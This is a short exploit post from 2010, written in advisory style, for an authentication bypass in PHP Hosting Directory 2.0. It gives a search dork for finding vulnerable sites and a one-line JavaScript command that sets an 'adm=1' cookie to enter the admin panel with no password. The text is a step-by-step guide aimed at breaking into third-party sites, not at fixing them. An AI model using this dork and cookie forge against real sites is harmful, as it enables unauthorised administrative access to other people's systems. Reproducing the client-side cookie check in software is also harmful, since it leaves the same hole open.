PHP Hosting Directory version 2.0 suffers from an insecure cookie vulnerability that allows for administrative bypass.
8b150cf2936f99115684a3763f8f6bc8f9d49535e8f94782cfb587b14f4f239b
-----------------------------------------------------------------------
#### ## ##
####o ##
####X .@##% ##@@#@ ## #@ @# @##@ ###%##X X##@
##@## ##@X#% ##@X##% ## ## ## ##X@## ###X@## o##@##
o# ## ## ## ## ### ## X# ## ## o## ### ## @## ##%
%# ## ##X ## ### ## # #@ X## ### ## ###X###
## ## X##@ ## ### ## #X #X %### ### ## #######
## @#o ### ## ### ## #@%#o @#o%## ### ## ###
######X ##@ ## ### ## %### ## ## ### ## ### ###
##X.@#@ # ### ## ### ## o### ## ## ### ## @##o##@
#@ ## #@X##X ## ### ## ### ##X@## ### ## ##@##
#X ## @##% ## ### ## X##% %#@@## ### ## ###X
-----------------------------------------------------------------------
-----------------------------------------------------------------------
-----------------------------------------------------------------------
ByPass PHP Hosting Version 2
-----------------------------------------------------------------------
-----------------------------------------------------------------------
-----------------------------------------------------------------------
# Exploit Title: [Php Hosting Admin Bypass]
# Date: [2010.10.10]
# Author: [ruiner_blackhat]
# Version: [Versin 2]
# My Group Web: [www.ashiyane.org/forums]
-----------------------------------------------------------------------
Hi
With this exploit you how to bypass the admin panel will hear
php hosting versin 2
-----------------------------------------------------------------------
Initially following dork in your searches:
Dork: "powered by PHP Hosting Directory 2.0"
After selecting one of the sites compiled by the admin panel.for example:
site.com/admin
Do not write anything in the password.
Enter the code below url and press enter.
javascript:document.cookie = "adm=1; path=/";
After being loaded with the error page and check back to refresh and
enter the portal panel Admin.
-----------------------------------------------------------------------
GoodLucK ;)
http://www.ashiyane.org/forums